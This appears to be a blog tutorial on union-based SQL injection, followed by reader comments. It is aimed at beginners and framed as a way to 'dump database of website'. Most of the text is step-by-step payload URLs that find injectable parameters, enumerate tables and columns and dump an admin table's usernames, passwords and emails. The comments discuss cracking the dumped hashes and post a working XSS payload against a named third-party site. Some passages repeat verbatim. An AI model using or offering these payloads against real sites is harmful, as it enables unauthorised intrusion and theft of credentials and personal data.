SQLi is the hacking way to dump database of website.
It is old trick, even though now too many websites are vulnerable to SQLi.
It is old trick, even though now too many websites are vulnerable to SQLi.
TUTORIAL FOR BEGINNERS
How to find SQLi vulnerability [Google Dorks]: http://pastebin.com/XKttipka
Finding vulnerability:
I got a link with URL http://www.ajithkp560.com/index.php?id=10
Now add a " ' " at the end of URL. That is http://www.ajithkp560.com/index.php?id=10'
If you get error message the website is vulnerable to SQLi
Finding total columns number
Finding columns by "order by"function
http://www.ajithkp560.com/index.php?id=10+order+by+1-- --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+2-- --> No error
http://www.ajithkp560.com/index.php?id=10+order+by+3-- --> No error
...
...
...
http://www.ajithkp560.com/index.php?id=10+order+by+10-- --> Error
From the error we can understand there are 9 columns.
Finding vulnerable column
Vulnerable column can be find out by union+select+1,2,3,...,TotalNumberOfColumns--
ie, http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,3,4,5,6,7,8,9--
**id=-10 is used for find the vulnerable column.
we can find SQL version by http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,@@version,4,5,6,7,8,9--
After find vulnerable column we want to grab all tables in DB[Data Base].
For this we can use the bellow fuction.
We can grab tables by bellow function,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables--
Next grab columns from table. We need to encode the table name to Hexa Decimal.
I'm going to encode table usuarios_adm to hexa decimal.
Encode it from here http://ajithkp560.hostei.com/online_tools/hexatool.php.
usuarios_adm=7573756172696f735f61646d
Now the URL becomes http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573756172696f735f61646d--
** 0xHexValue --> 0x is preprocessing command to understand it is an HexaDecimal encode.
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name_1,0x3a, column_name_2,0x3a,....column_name_n,0x3b),4,5,6,7,8,9+from+table_name_xxx--
I have dumped the data here by,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(user,0x3a,pass,0x3a,email,0x3b),4,5,6,7,8,9+from+usuarios_adm--
------------------------->>>>>>>>>>>>>Write Your Comments<<<<<<<<<<<<<<---------------------------
Encode it from here http://ajithkp560.hostei.com/online_tools/hexatool.php.
usuarios_adm=7573756172696f735f61646d
Now the URL becomes http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x7573756172696f735f61646d--
Dumping Data from column
Dumping data from by,http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(column_name_1,0x3a, column_name_2,0x3a,....column_name_n,0x3b),4,5,6,7,8,9+from+table_name_xxx--
I have dumped the data here by,
http://www.ajithkp560.com/index.php?id=-10+union+select+1,2,group_concat(user,0x3a,pass,0x3a,email,0x3b),4,5,6,7,8,9+from+usuarios_adm--
------------------------->>>>>>>>>>>>>Write Your Comments<<<<<<<<<<<<<<---------------------------
11 comments
Write commentsWhat are the random numbers, letters, and symbols that show up at the end? For example: 'rh4T7iQ#$'.
ReplyThat is encrypted password...
ReplyHow do you decrypt it? Are there programs?
ReplyDepends on their encryprtion...
ReplySo you have to guess as to what the encryption is?
ReplyI am working on Mafia Wars by Zynga in order to change data, how would one go about doing that
ReplyNice post very helpful
Replydbakings
Nice post very helpful
Replydbakings
Even in 2016 this site is still vulnerable ...
ReplyStill vulnerable to XSS: http://www.outtakes.co.uk/search.php?search=%3Cscript%3Ealert%28%27AJITHKP560%27%29%3B%3C%2Fscript%3E
ReplyThanks bro,,, thanks for your support and love... :)
Reply